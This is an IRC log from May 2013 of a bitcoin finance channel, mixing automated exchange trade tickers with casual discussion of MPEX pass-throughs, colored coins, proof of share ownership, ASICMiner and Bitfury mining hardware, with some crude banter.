4321 @ 0.00070908 = 3.0639 BTC [+] May 13 03:28:00 [HAVELOCK] [VTX] 3 @ 0.4256 = 1.2768 BTC [-] May 13 03:29:15 I've got O.USD.C143T up for sale on MPEX if anyone is interested, 0.11 ea May 13 03:34:55 [MPEX] [S.MPOE] 9300 @ 0.00070923 = 6.5958 BTC [+] May 13 03:34:58 [MPEX] [S.MPOE] 2000 @ 0.00070956 = 1.4191 BTC [+] May 13 03:37:50 [BTCTC] [PAJKA.BOND] 4 @ 0.1089 = 0.4356 BTC [+] May 13 03:45:01 [HAVELOCK] [ASICM] 5 @ 0.01491 = 0.0746 BTC [+] May 13 03:45:47 [MPEX] [S.MPOE] 6300 @ 0.00070908 = 4.4672 BTC [-] May 13 03:46:26 what are ripples worth these days, someone is soliciting me to sell mine May 13 03:48:32 err, 0 May 13 03:48:35 give them to me May 13 03:49:55 10K for 1btc May 13 03:50:12 https://ripplecharts.com/market/BTC:Bitstamp/XRP May 13 03:50:59 sold the 40k giveaway @ 8K = 5btc haha best giveaway ever May 13 04:03:27 [BTCTC] [ASICMINER-PT] 1 @ 1.544798 BTC [+] May 13 04:03:50 [BTCTC] [ASICMINER-PT] 1 @ 1.544799 BTC [+] May 13 04:03:58 [BTCTC] [ASICMINER-PT] 23 @ 1.5448 = 35.5304 BTC [+] May 13 04:05:37 [BTCTC] [TAT.ASICMINER] 85 @ 0.01495 = 1.2708 BTC [-] May 13 04:17:30 [MPEX] [S.MPOE] 879 @ 0.00070908 = 0.6233 BTC [-] May 13 04:17:32 [MPEX] [S.MPOE] 4609 @ 0.00070837 = 3.2649 BTC [-] May 13 04:17:39 [MPEX] [S.MPOE] 212 @ 0.00070667 = 0.1498 BTC [-] May 13 04:23:01 [HAVELOCK] [HIM] 11 @ 2.2301 = 24.5311 BTC [-] May 13 04:24:09 [BTCTC] [TAT.ASICMINER] 15 @ 0.01495 = 0.2243 BTC [-] May 13 04:31:32 [BTCTC] [TAT.ASICMINER] 15 @ 0.0148 = 0.222 BTC [-] May 13 04:31:55 [BTCTC] [TAT.ASICMINER] 65 @ 0.01476 = 0.9594 BTC [-] May 13 04:32:01 [HAVELOCK] [SDICE] 2 @ 0.2994 = 0.5988 BTC [+] May 13 04:32:41 [BTCTC] [PAJKA.BOND] 1 @ 0.107 BTC [-] May 13 04:35:00 https://bitcointalk.org/index.php?topic=197775.0 May 13 04:38:38 [BTCTC] [COGNITIVE] 1 @ 0.17479 BTC [+] May 13 04:39:42 [MPEX] [S.MPOE] 4109 @ 0.00070667 = 2.9037 BTC [-] May 13 04:39:43 [MPEX] [S.MPOE] 11287 @ 0.00070666 = 7.9761 BTC [-] May 13 04:40:00 [HAVELOCK] [ASICM] 50 @ 0.01471 = 0.7355 BTC [-] May 13 04:43:30 [BTCTC] [TAT.ASICMINER] 11 @ 0.01505 = 0.1656 BTC [+] May 13 04:44:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.01505 = 0.1505 BTC [+] May 13 04:47:37 [BTCTC] [TAT.ASICMINER] 25 @ 0.01505 = 0.3763 BTC [+] May 13 04:52:13 has anyone used colored coins to sell equity or anything like that? May 13 04:52:45 Tritonio_ http://trilema.com/2013/why-i-nixed-p2p-colored-coins-and-all-that-jazz/ May 13 04:56:58 Tritonio_: its way too alpha to be used for srs biz May 13 04:57:18 mps point are somewhat weak, if his trade ledger is not public, though May 13 04:59:00 As an answer to some of mircea_popescu problems in the article: You could still have centralized exchanges. The difference would be that you can take you assets anytime out of the exchange and move them to another one to trade them there. That solves the blockchain spamming, the delays, the easy of use issues. May 13 04:59:00 [HAVELOCK] [HIM] 1 @ 2.23 BTC [-] May 13 04:59:02 the ecosystem around 'em ain't there yet May 13 04:59:13 but they're a bril idea May 13 04:59:17 this is in fact already resolved. May 13 04:59:20 Tritonio_: no point arguing that May 13 04:59:22 you make a mpex contract and PTs. May 13 04:59:40 What's PTs? May 13 04:59:44 pass throughs May 13 04:59:45 it might be good for equity stakes to be less-than-instantly liquid May 13 04:59:46 i dunno why people feel the overpowering need to recreate poor solutions for solved problems May 13 04:59:53 other than everyone's young and a coder. May 13 04:59:58 but at that point just sign some papers May 13 05:00:39 in that ricardian contracts are ok for centralized exchanges May 13 05:00:40 well duh May 13 05:00:45 decentralized is kinda way too new May 13 05:01:09 super too new May 13 05:01:20 we can try it in a decade or three May 13 05:01:37 nah, implementations are already there May 13 05:01:38 but honestly why bother? May 13 05:01:42 how about a decade or three after citizen dentistry becomes the norm. May 13 05:01:53 but verification it will scale, wont suddenly fall apart etc is not May 13 05:01:54 finance is not a matter of tech or platform. May 13 05:02:02 you gotta gain the trust of people somehow to legitimate your biz-mod May 13 05:02:04 finance is a matter of having the fucking people competent in finance. May 13 05:02:08 exchanges are a good way to do that May 13 05:02:42 it's be a neat thing for a bunch of nerds who own shares in an REIT to pass them around May 13 05:02:49 mircea_popescu: people who are clueless about finance are called 'liquidity' though :) May 13 05:02:56 ezdiy notrly. May 13 05:03:15 [BTCTC] [PAJKA.BOND] 1 @ 0.107 BTC [-] May 13 05:03:18 this is for some reason a widely held mistaken belief. people who are clueless are called "idiot with a power tool" May 13 05:03:27 they wreck things. May 13 05:03:48 colored coins might be a good way to keep exchanges honest when trading assets between the May 13 05:03:52 themselves* May 13 05:04:34 and stock in these companies needs some sort of owner-controllable features May 13 05:04:40 benkay: well, duh May 13 05:04:45 but once again, its huge gamechanger May 13 05:04:46 i can't ask MP to send me my S.DICE shares, I don't think May 13 05:04:54 because exchanges are no longer in power May 13 05:04:56 what do you mean benkay ? May 13 05:05:08 only market indexes of individual colors are May 13 05:05:08 mircea May 13 05:05:15 will you send me my s.dice shares? May 13 05:05:28 did you buy some from me ? or ? May 13 05:05:34 my theoretical shares May 13 05:05:36 you already have them May 13 05:05:48 under my name, on mp's exchange May 13 05:05:54 what, in an applecart ? May 13 05:06:02 only mp can honor them anyway May 13 05:06:05 dont bother benkay :) May 13 05:06:08 i was thinking a symbol representing them, cryptographically signed to me May 13 05:06:32 but sure fedex works May 13 05:06:39 STAT ? May 13 05:06:44 inorite? May 13 05:06:56 totally sufficient proof to me that i own a stake in a publicly traded company. May 13 05:06:58 i mean... wtf. this is so obvious ? May 13 05:07:17 i buy stock in pepsi May 13 05:07:21 jump through a million hoops May 13 05:07:26 can have actual certificate May 13 05:07:33 its same here May 13 05:08:01 you can bug the actual owner who have them on mpex, whoever that may be May 13 05:08:01 [HAVELOCK] [HIM] 3 @ 2.1299 = 6.3897 BTC [-] May 13 05:08:02 [MPEX] [S.BBET] 100 @ 0.0017 = 0.17 BTC [-] May 13 05:08:11 and at certain point bug friedcat to change his db May 13 05:08:18 million hoops May 13 05:08:20 not transparent May 13 05:08:33 again, if you confront mp with that, youre stupid and dont understand markets etc May 13 05:08:36 :) May 13 05:08:41 i completely fail to understand what you're after here May 13 05:08:41 what do I get when we're all satisfied that the shares are in my posession? May 13 05:08:54 the problem is absolutely and completely solved and you're like... hitting yourself in the head with the solution. May 13 05:08:55 wtfd. May 13 05:09:47 what do you claim is the MPEx equivalent to the printed piece of bs i get from pepsi? May 13 05:09:56 he wants a share that is independent of mpex yet honored May 13 05:09:58 benkay: the ricardian ledger is actual proof of ownership though May 13 05:10:28 benkay your stat May 13 05:10:36 or, if you prefer, a signed push receipt to some designated acct. May 13 05:10:48 this is in numerous ways better than the p2p ledger thing. May 13 05:11:35 benkay: but the vendor lockin and hoops will be always there, not just on mpex May 13 05:11:38 its same everywhere May 13 05:11:51 look, if there's enough people like you you can actually make a special mpex account, May 13 05:11:56 anyone who wants pushes you shares May 13 05:12:00 and you issue them paper certificates May 13 05:12:03 via fedex. May 13 05:12:07 dun dun dun. May 13 05:12:12 lol May 13 05:12:17 haha May 13 05:12:25 i mean srsly. it's all there. May 13 05:12:42 i don't want paper though, i want a cryptotoken I can send to someone else May 13 05:12:46 but w/e May 13 05:12:50 what i want doesn't matter May 13 05:12:50 not to be a turd, but mpex has shown in the past that it does not provide actual receipts of purchase, only confirmations of purchase orders May 13 05:12:53 okay, YOUR PUSH RECEIPT May 13 05:12:54 jesus god May 13 05:13:09 ThickAsThieves: are other exchanges any bether? May 13 05:13:12 (the bugpowder Puts incident) May 13 05:13:13 ThickAsThieves: they just pt each other May 13 05:13:47 ThickAsThieves you know, between (mpex, nasdaq) it's nasdaq that most recently rolled over trades. May 13 05:13:49 i think mp is the only one bothering with actual signed proof of purchase, on bitfunder its like row in a database which is much worse May 13 05:14:13 i'm not saying anyone else is better May 13 05:14:22 just reminding that there are caveats May 13 05:14:23 but May 13 05:14:30 its true you dont directly the shares May 13 05:14:45 *directly own May 13 05:15:02 market mechanics around p2p exchanges are going to be silly and decades away if ever extant May 13 05:15:08 you don't "directly" own any sharesd in the entire history of equities May 13 05:15:09 i agree that the state of proof of ownership on other exchanges is certainly questionable May 13 05:15:09 doing it different way would be too burdensome on issuers May 13 05:15:12 you are going to give mp a stroke May 13 05:15:14 which is why exchanges act as proxy May 13 05:15:24 jborkl_ they're on that path fo sho. May 13 05:15:41 oh that's a cool claim, what do you mean by that mp? May 13 05:15:43 you can do anything you want with the fucking receipt.it is your certificate May 13 05:15:53 mircea_popescu: own, as in directly interact with issuers regarding equity ownership. May 13 05:15:58 except when it isnt May 13 05:16:12 benkay specifically what it says on the box. a share is NOT real estate. May 13 05:16:21 you don't "directly" own it May 13 05:16:23 is this page trusted: http://www.bitcoinx.org/ ? May 13 05:16:28 (sorry if my clarifications of my inaccurate statements are driving you crazy) May 13 05:16:32 for that matter you don't have alodial title on your real estate, either, it's fee simple May 13 05:16:38 I can't find anything about it on bitcointalk. May 13 05:16:51 Tritonio_ unheard of afaik. May 13 05:16:51 it's run by the bitcoinx guys May 13 05:16:55 I forget, does SDICE stock give you a piece of teh company or just profits? May 13 05:16:59 gonna give you a virus tho May 13 05:17:06 lol May 13 05:17:09 its bitcoinx.com lol May 13 05:17:14 :) May 13 05:17:14 as in, if Erik sold the company, is the money split out to all shareholders? May 13 05:17:20 ThickAsThieves yes May 13 05:17:23 word May 13 05:17:52 i do think mp runs the most secure and verifiable exchange May 13 05:18:00 [HAVELOCK] [ASICM] 8 @ 0.01471 = 0.1177 BTC [-] May 13 05:18:02 [HAVELOCK] [ASICM] 34 @ 0.0147 = 0.4998 BTC [-] May 13 05:18:03 [HAVELOCK] [ASICM] 74 @ 0.01465002 = 1.0841 BTC [-] May 13 05:18:04 [HAVELOCK] [ASICM] 41 @ 0.01465001 = 0.6007 BTC [-] May 13 05:18:05 Tritonio_: bitcoinx is super alpha stage, no fucking clue why are they so aggresively pushing it :( May 13 05:18:15 [BTCTC] [TAT.ASICMINER] 37 @ 0.01505 = 0.5569 BTC [+] May 13 05:18:16 but i dont mind tryng to poke holes in it either ;) May 13 05:18:25 well me either, that's not the issue at all May 13 05:18:32 [BTCTC] [ASICMINER-PT] 1 @ 1.519999 BTC [-] May 13 05:18:44 how would I go about sending some shares to my kid, someday when accounts are ludicrously expensive? May 13 05:18:50 ezdiy, I"m trying to find the latest client that supports colored coins. I'll grab it from the forum instead just to be safe... May 13 05:18:54 benkay broker ? May 13 05:19:02 yeah May 13 05:19:03 Tritonio_: https://github.com/killerstorm May 13 05:19:08 you can use mpex as a payment portal to other members. a instant exchange with PUSH. the possibilites are numerous May 13 05:19:10 that is my option, innit? May 13 05:19:12 yeah killerstorm had something May 13 05:19:28 Tritonio_: or better yet, lurk in https://groups.google.com/forum/?hl=cs&fromgroups=#!forum/bitcoinx first May 13 05:19:31 benkay logically you would use some sort of notary or equivalent May 13 05:19:33 where most of tech discussion takes place May 13 05:19:39 [BTCTC] [ASICMINER-PT] 4 @ 1.490001 = 5.96 BTC [-] May 13 05:19:39 ie, a trusted third party to make the transfer once you're dead. May 13 05:20:04 I just have this silly desire to disintermediate all of the things. May 13 05:20:05 [BTCTC] [ASICMINER-PT] 67 @ 1.49 = 99.83 BTC [-] May 13 05:20:10 but why! May 13 05:20:14 because! May 13 05:20:15 :) May 13 05:20:18 because efficient capital flows ;) May 13 05:20:22 this is the reason jborkl_ said stroke earlioer. May 13 05:20:35 this is fundamentally a braindamaged notion, that disintermediation is always good. May 13 05:20:37 benkay: give up, mp is a control freak May 13 05:20:44 there's a reason restaurants have waitresses May 13 05:20:49 thanks May 13 05:20:52 every time noobs want to roar free out of his control hes close to passing out May 13 05:20:54 and cooks. you COULD go in the kitchen and make your own pie. May 13 05:20:57 but it would suck. May 13 05:21:03 ezdiy totally. May 13 05:21:41 nah it'd be great May 13 05:21:46 people would lose shares and shit May 13 05:22:02 i just scared myself thinking of this restaurant where a bunch of people cooked themselves May 13 05:22:08 nothing would ever be washed May 13 05:22:09 etc. May 13 05:22:17 but that's your own kitchen, though May 13 05:22:22 when you want pro grade service, go out May 13 05:22:26 take the shares to an exchange May 13 05:22:35 but shit learn to cook May 13 05:22:37 I actually helped with the branding for a such a kitchen May 13 05:22:40 do some things for yourself May 13 05:22:42 it would go broke also cause the cooks suck May 13 05:22:50 they gave up the cook for yourself part in the 1st week May 13 05:22:53 and went normal May 13 05:23:04 lol May 13 05:23:09 was called As You Like It May 13 05:23:16 Tritonio_: btw, theres webclient demo as well http://webcoinx.tumak.cz/index.html , and here howto https://bitcointalk.org/index.php?topic=141858.msg1919807#msg1919807 how to issue May 13 05:23:21 "The Kitchen is Your Stage" May 13 05:23:37 ThickAsThieves clearly as the noobs got free out of the cook's control... May 13 05:23:57 they went out of business in year 1 too May 13 05:24:02 but they were nice designs... May 13 05:24:35 right-o May 13 05:24:38 bootstrap May 13 05:24:43 [BTCTC] [BITVPS] 2 @ 0.00094 = 0.0019 BTC [-] May 13 05:24:56 i have a different question, would/could mpex allow a PT on it? May 13 05:25:06 it does all the time May 13 05:25:12 what, all the stocks there are pt'd multiple places May 13 05:25:17 no May 13 05:25:22 i stock you dont control May 13 05:25:25 a May 13 05:25:31 bah May 13 05:25:32 the PT would be on MPEX May 13 05:25:32 :) May 13 05:25:42 in principle. tho the only time i tried it ended up poorly. May 13 05:26:18 which exchange? which 'asset'? May 13 05:26:37 benkay there was a pt to gigavps's bond thing last year. May 13 05:26:51 the exchange imploded, the guy changed his contract, it died a horrible death. May 13 05:27:06 so i'm not terribly keen of repeating the experience. May 13 05:27:14 [BTCTC] [ASICMINER-PT] 5 @ 1.5 = 7.5 BTC [+] May 13 05:27:26 makes sense May 13 05:27:36 lemme know if you ever change your mind ;) May 13 05:27:56 well, generally its termed GLBSE hell May 13 05:28:05 if you list every penny stock & pump ... May 13 05:28:30 ThickAsThieves it certainly wouldn't be for an exchange that doesn't offer signed proofs and doesn't use gpg contracts. May 13 05:28:51 I was more thinking AM May 13 05:29:05 which isnt actually on an exchange May 13 05:29:22 ThickAsThieves: you have to find the original investors May 13 05:29:27 who back mp's pt, thats it May 13 05:29:34 hoops hoops hoops May 13 05:29:42 ezdiy, you lost me May 13 05:30:13 ThickAsThieves i think the only sane way to actually have asicminer listed is for friedcat to come to his senses and sign an actual contract. May 13 05:30:31 I assumed May 13 05:30:50 but I also don't think that'll ever happen May 13 05:30:52 did he intend to list on mpex at one point? May 13 05:31:11 that would boost the price of AM more than anything IMO May 13 05:31:33 AM share value is sorta meaningless to Friedcat May 13 05:31:36 [MPEX] [S.MPOE] 1850 @ 0.00070956 = 1.3127 BTC [+] May 13 05:31:38 [MPEX] [S.MPOE] 4321 @ 0.00071034 = 3.0694 BTC [+] May 13 05:31:40 [MPEX] [S.MPOE] 10082 @ 0.00071147 = 7.173 BTC [+] May 13 05:31:41 [MPEX] [S.MPOE] 2047 @ 0.00071231 = 1.4581 BTC [+] May 13 05:31:49 he already sold out May 13 05:31:49 so why wouldn't it happen ? May 13 05:32:02 other than in order to reserve his ability to later pull a giga on everone ? May 13 05:32:20 he regularly exhibits that he prefers to control all transactions May 13 05:32:27 from hardware sales May 13 05:32:31 but does he own bitfountain shares? May 13 05:32:31 to share xfers May 13 05:32:46 mkay... May 13 05:32:54 I suppose he could list Bitfountain May 13 05:33:03 which represents more than 50% of AM May 13 05:33:20 that would be interesting May 13 05:33:23 yes so he does still ownn AM in that case May 13 05:34:14 that would also give him IPO funds to start a separate BitFountain venture May 13 05:34:32 jborkl_ iirc about 15% or so of glbse held shares were never allocated to anyone so they reverted. May 13 05:34:52 correct May 13 05:34:57 maybe only 10% May 13 05:35:02 I forget the amount May 13 05:35:39 something in that neighbourhood May 13 05:35:40 [BTCTC] [COGNITIVE] 2 @ 0.146001 = 0.292 BTC [-] May 13 05:35:47 40k shares or 20k shares depending on which way it was issued May 13 05:36:26 [BTCTC] [ASICMINER-PT] 10 @ 1.5 = 15 BTC [+] May 13 05:37:14 at any rate this vague situation of a 200 page forum thread anyone may edit can not end well. May 13 05:38:34 It can end well, but it easily might not May 13 05:38:46 [MPEX] [S.MPOE] 2250 @ 0.00070878 = 1.5948 BTC [-] May 13 05:38:48 [MPEX] [S.MPOE] 2282 @ 0.00070666 = 1.6126 BTC [-] May 13 05:38:50 [MPEX] [S.MPOE] 4321 @ 0.00070588 = 3.0501 BTC [-] May 13 05:38:52 [MPEX] [S.MPOE] 6800 @ 0.00070587 = 4.7999 BTC [-] May 13 05:38:58 yeah well... May 13 05:39:00 [MPEX] [S.MPOE] 1997 @ 0.00070581 = 1.4095 BTC [-] May 13 05:39:04 most public companies endings are not "well" May 13 05:39:43 moreover, he's getting a lot of pent up pressure what with all the cluieless "investors" May 13 05:40:10 people have internet-sued kakobrekla and made asses of themselves in this chan even when stuff was clearly written out May 13 05:40:14 yeah, the culture of his shareholders is worrisome May 13 05:40:19 but at least they can't vote May 13 05:40:58 in the end... no skin of my personal back so i guess we sit, relax and enjoy the view. May 13 05:41:18 I'll watch from the inside May 13 05:41:42 don't take too big of a loss before getting out, tat May 13 05:41:45 try and hedge. May 13 05:41:48 I am May 13 05:42:09 mostly this venture is arbitrage where I keep a piece forever May 13 05:42:11 i wonder if those bitfury ppl actually deliver May 13 05:42:26 [BTCTC] [ASICMINER-PT] 1 @ 1.47102 BTC [-] May 13 05:43:05 ;;calc 13.79 / 112.18 May 13 05:43:05 0.122927438046 May 13 05:43:11 i wonder who buys the bitfury box? May 13 05:43:50 well if indeed it does < 1W per gh... May 13 05:43:52 many people May 13 05:43:57 the limit will be how many he can make May 13 05:44:42 dat 90k though May 13 05:45:03 90k ? May 13 05:45:08 hold please May 13 05:45:28 ;;bc,stats May 13 05:45:30 Current Blocks: 235921 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 1966 blocks | Next Difficulty In About: 1 week, 4 days, 13 hours, 33 minutes, and 10 seconds | Next Difficulty Estimate: 12813878.5684 | Estimated Percent Change: 14.53995 May 13 05:45:32 yeah, estimated price of 90kusd May 13 05:45:39 im out of the loop ? May 13 05:45:44 ;;estimate May 13 05:45:46 Next difficulty estimate | 12813878.5684 based on data since last change | 12318260.5559 based on data for last three days May 13 05:45:46 http://www.bitfury.org/bitfury110.html May 13 05:46:27 those are spartans fpga May 13 05:46:31 not asic May 13 05:46:35 srsly ppl. May 13 05:46:39 afaik that'd old May 13 05:46:42 yea May 13 05:46:44 derp May 13 05:46:47 like 1 year old. May 13 05:46:53 more May 13 05:46:55 doodly derp May 13 05:47:12 110gh from AM is about $50k at current rates May 13 05:47:40 bring your own rack though May 13 05:47:44 afaik May 13 05:48:26 [BTCTC] [TAT.ASICMINER] 20 @ 0.0151 = 0.302 BTC [+] May 13 05:48:53 what is this picostocks? May 13 05:49:41 dunno, it's to retarded looking for me to take seriously May 13 05:49:43 some extremelky scammy looking thing that nevertheless is still around May 13 05:49:55 too* May 13 05:50:35 benkay https://bitcointalk.org/index.php?topic=140366.msg1495160#msg1495160 May 13 05:51:30 bitfury claims to be operating out of a washington data cetner May 13 05:51:31 center May 13 05:52:41 benkay: its kinda wtf indeed https://bioinfo.pl/services.html May 13 05:53:40 i thought he was russian or something May 13 05:55:14 what is that bioinfo link in regards to? May 13 05:55:17 ezdiy? May 13 05:56:33 maybe it is related to this? https://picostocks.com/stocks May 13 05:56:34 same ssl certificate May 13 05:56:36 as picostocks May 13 05:56:45 Proteon Pharma May 13 05:56:46 bahahaha May 13 05:56:49 is listed on Pico May 13 05:57:39 mmmm, east european illicit rx pharma? :) May 13 05:57:55 i'd invest in that in a jiffy May 13 05:57:58 dividends paid in adderall May 13 05:58:28 [BTCTC] [ASICMINER-PT] 1 @ 1.490004 BTC [+] May 13 05:58:30 mircea_popescu do you have a link to the thread where your PR tore picostocks a new one? May 13 05:58:41 above ? May 13 05:59:01 [HAVELOCK] [ASICM] 26 @ 0.01491 = 0.3877 BTC [+] May 13 05:59:03 oh point 2 May 13 06:00:33 There is one more important innovation. All transactions and all user accounts are public. It is possible to monitor the action of "best" traders and review their market position. May 13 06:00:43 I was looking for this link: May 13 06:00:44 https://bitcointalk.org/index.php?topic=133147.0;all May 13 06:07:26 why does verifying a message work in bitcoin-qt, but not on blockchain.info? May 13 06:07:35 version thing? May 13 06:09:01 [HAVELOCK] [ASICM] 307 @ 0.01491 = 4.5774 BTC [+] May 13 06:10:05 [BTCTC] [S.DICE-PT] 7 @ 0.00318 = 0.0223 BTC [-] May 13 06:11:59 [BTCTC] [ASICMINER-PT] 1 @ 1.539995 BTC [+] May 13 06:14:01 [HAVELOCK] [ASICM] 3 @ 0.01491 = 0.0447 BTC [+] May 13 06:14:18 [BTCTC] [ASICMINER-PT] 1 @ 1.539996 BTC [+] May 13 06:15:33 hi all May 13 06:15:41 ola May 13 06:15:57 whats new May 13 06:16:04 [BTCTC] [TAT.ASICMINER] 6 @ 0.01495 = 0.0897 BTC [-] May 13 06:16:43 mpex is gonna list AM May 13 06:17:03 jk! May 13 06:18:00 [HAVELOCK] [ASICM] 9 @ 0.01491 = 0.1342 BTC [+] May 13 06:18:11 [MPEX] [S.MPOE] 2535 @ 0.00070621 = 1.7902 BTC [+] May 13 06:18:13 [MPEX] [S.MPOE] 1316 @ 0.00070581 = 0.9288 BTC [-] May 13 06:20:02 mjr___ http://bitbet.us/bet/450/bitfurys-asic-will-work-with-power-1/ May 13 06:20:29 this pretty much. a challenger appears in asic market, plonks down ~15k usd on the theory he delivers. May 13 06:20:33 more than bfl ever did. May 13 06:20:44 or no, i think they did 500 btc when it was about 16 ? May 13 06:21:13 they also claim that they will honor the 1000btc donation to charity May 13 06:21:13 thats embarrasing when you are mentioned as an exclusion on bitbet May 13 06:21:33 but BFL claiming something isnt worth much May 13 06:22:25 ThickAsThieves claiming is nothing. this guy qactually sent the btc over, he's not getting it back unless he delivers. May 13 06:22:35 bitbet ain't scamsofbitco.in May 13 06:30:18 @ThickAsThieves, on verifying, can't tell you exactly why, but after checking about 30 sigs I now request the sender verify the message themselves and tell me which client and version they used. May 13 06:30:51 [MPEX] [S.MPOE] 4650 @ 0.00070581 = 3.282 BTC [-] May 13 06:31:26 thx May 13 06:31:33 it was easy enough for me to try both May 13 06:34:16 [BTCTC] [ASICMINER-PT] 1 @ 1.500019 BTC [-] May 13 06:34:26 [BTCTC] [ASICMINER-PT] 1 @ 1.500012 BTC [-] May 13 06:34:34 [BTCTC] [ASICMINER-PT] 2 @ 1.500007 = 3 BTC [-] May 13 06:34:51 [BTCTC] [ASICMINER-PT] 2 @ 1.5 = 3 BTC [-] May 13 06:35:02 [BTCTC] [ASICMINER-PT] 30 @ 1.5 = 45 BTC [-] May 13 06:41:43 MikeMark i've not yet had a problem May 13 06:45:10 [MPEX] [S.MPOE] 7537 @ 0.00070581 = 5.3197 BTC [-] May 13 06:45:12 [MPEX] [S.MPOE] 3863 @ 0.00070578 = 2.7264 BTC [-] May 13 06:45:41 mircea_popescu, That's lucky. I had many, especially when verifying signed messages from blockchain.info wallet. I think they've been notified. May 13 06:46:15 wait. you mean gpg verify or bitcoin addy sig verify ? May 13 06:47:00 bitcoin addy signed message. May 13 06:47:10 [BTCTC] [TAT.ASICMINER] 100 @ 0.014701 = 1.4701 BTC [-] May 13 06:47:44 gpg always works. May 13 06:47:46 a that's a mess. May 13 06:47:56 yeah. nm, i thought you meant gpg. May 13 06:48:01 [HAVELOCK] [ASICM] 100 @ 0.0147001 = 1.47 BTC [-] May 13 06:48:48 lol ThickAsThieves arbiting that 0.0001 May 13 06:51:21 lol May 13 06:51:29 not exactly May 13 06:53:02 https://109.201.133.65/index.php?topic=90370.msg997994#msg997994 << back when kako was young May 13 06:57:32 [MPEX] [S.MPOE] 4321 @ 0.00070752 = 3.0572 BTC [+] May 13 06:57:35 [MPEX] [S.MPOE] 5111 @ 0.00070776 = 3.6174 BTC [+] May 13 07:00:19 [BTCTC] [TAT.ASICMINER] 28 @ 0.0149 = 0.4172 BTC [+] May 13 07:03:44 [BTCTC] [TAT.ASICMINER] 20 @ 0.01495 = 0.299 BTC [+] **** BEGIN LOGGING AT Mon May 13 13:28:34 2013 May 13 13:31:42 https://bitcointalk.org/index.php?topic=203107.msg2129982#msg2129982 May 13 13:31:51 so basically if the russians actually deliver their 400th or w/e May 13 13:32:06 a. i will have been right that the asic winner was not known all through May 13 13:32:14 b. asicminer is what, 5% of that ? May 13 13:34:37 [BTCTC] [TAT.ASICMINER] 57 @ 0.01512 = 0.8618 BTC [+] May 13 13:42:19 oh dear the Russians are coming May 13 13:43:55 hi all May 13 13:44:06 Good Merning May 13 13:44:33 yeh. May 13 13:44:44 good morning May 13 13:45:37 [MPEX] [S.MPOE] 5957 @ 0.000709 = 4.2235 BTC [+] May 13 13:45:39 [MPEX] [S.MPOE] 5843 @ 0.0007105 = 4.1515 BTC [+] May 13 13:48:57 [BTCTC] [TAT.ASICMINER] 40 @ 0.01512 = 0.6048 BTC [+] May 13 13:49:59 [BTCTC] [TAT.ASICMINER] 78 @ 0.01521 = 1.1864 BTC [+] May 13 13:51:46 [BTCTC] [BASIC-MINING] 1 @ 0.449999 BTC [-] May 13 13:54:31 [BTCTC] [TAT.ASICMINER] 11 @ 0.01521 = 0.1673 BTC [+] May 13 13:56:36 ohai May 13 13:56:44 what is this room May 13 13:57:20 this is the room. May 13 13:57:24 you should try #bitcoin-anal instead May 13 13:57:43 hey davout and kakobrekla May 13 13:57:47 whats new May 13 13:57:49 hi May 13 13:57:59 25 alt chains. May 13 13:58:01 lol May 13 13:58:04 ah sry that was yest May 13 13:58:13 i thought i saw them all going down May 13 13:58:18 yep May 13 13:58:21 also, i think we are at the start of a mini rally May 13 13:58:22 and btc is next omg bbq May 13 13:58:45 hm? May 13 13:58:49 i am going to show off this idea (project buttonwood) at the conference May 13 13:58:59 that has nothing to do with the rally lol May 13 13:59:06 i just think we are gonna see a pop today May 13 13:59:09 KRS-1: i left #bitcoin-anal when there was only jurov and me in the chan, was getting awkward XD May 13 13:59:24 i never understood the purpose of that chan May 13 13:59:26 (^^) May 13 13:59:59 anyway, today is the second open outcry exchange! May 13 14:00:06 mjr_2: my gf never understood the purpose of anal sex, yet ... May 13 14:00:14 http://www.startribune.com/local/207070851.html May 13 14:00:22 Two months before that, attorney Thomas P. Lowe of Eagan was suspended for a minimum of 15 months for having a sexual relationship with a client he was representing in a divorce case, and including the time spent during their trysts in his billable hours. May 13 14:00:31 mjr_2: yay! May 13 14:00:41 fiat500 this is the room where we do bitcoin finance. May 13 14:00:42 who are you ? May 13 14:00:52 mircea_popescu: classy May 13 14:00:58 please upvote if you have a few secs May 13 14:01:07 davout lawyers, right ? May 13 14:01:15 yup May 13 14:01:16 will expect you to pay for the time they take fucking your wife. May 13 14:01:34 :-) May 13 14:02:18 mircea_popescu: i'd totally pay her hourly rate to fuck our lawyer May 13 14:02:19 http://profile.ak.fbcdn.net/hprofile-ak-snc4/174309_1015604382_734562_n.jpg May 13 14:05:27 lol davout May 13 14:05:54 idk its mircea_popescu's chan I was just holding it open for him May 13 14:06:19 it's my chan ?! May 13 14:06:37 dude! /msg chanserv FLAGS +m May 13 14:07:08 when I tried taking it didnt you say you got that room a while ago but can't remember why.. May 13 14:08:27 guess there really is no need to for a dual purpose bitcoin channel with a focus on rectal health.. May 13 14:13:21 o you were talking of -anal May 13 14:13:26 i thot you were talking of this one May 13 14:14:59 maybe we should party in there just one more time on say Friday night maybe..one final blowout. May 13 14:16:10 im seeing bearish signals on my graphs..was there selloffs coming today or this week maybe May 13 14:39:57 hey KRS-1 you broke the internets May 13 14:41:22 [BTCTC] [TAT.ASICMINER] 8 @ 0.01521 = 0.1217 BTC [+] May 13 14:41:22 [BTCTC] [ASICMINER-PT] 1 @ 1.514001 BTC [-] May 13 14:41:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.015233 = 0.0305 BTC [+] May 13 14:41:28 [BTCTC] [ASICMINER-PT] 1 @ 1.547999 BTC [+] May 13 14:41:28 [BTCTC] [ASICMINER-PT] 1 @ 1.53 BTC [-] May 13 14:41:28 [MPEX] [S.MPOE] 1300 @ 0.00071155 = 0.925 BTC [-] May 13 14:41:28 [MPEX] [S.MPOE] 4321 @ 0.00070813 = 3.0598 BTC [-] May 13 14:41:28 [MPEX] [S.MPOE] 8079 @ 0.00070791 = 5.7192 BTC [-] May 13 14:41:28 [BTCTC] [ASICMINER-PT] 2 @ 1.53 = 3.06 BTC [-] May 13 14:41:30 [HAVELOCK] [HIM] 1 @ 2.15 BTC [-] May 13 14:41:31 [BTCTC] [ASICMINER-PT] 1 @ 1.514002 BTC [-] May 13 14:42:05 [BTCTC] [ASICMINER-PT] 1 @ 1.514 BTC [-] May 13 14:43:35 [BTCTC] [ASICMINER-PT] 1 @ 1.511 BTC [-] May 13 14:43:55 [BTCTC] [BTC-BOND] 1 @ 0.010098 BTC [+] May 13 14:45:13 [BTCTC] [ASICMINER-PT] 2 @ 1.501001 = 3.002 BTC [-] May 13 14:45:26 [BTCTC] [ASICMINER-PT] 4 @ 1.501 = 6.004 BTC 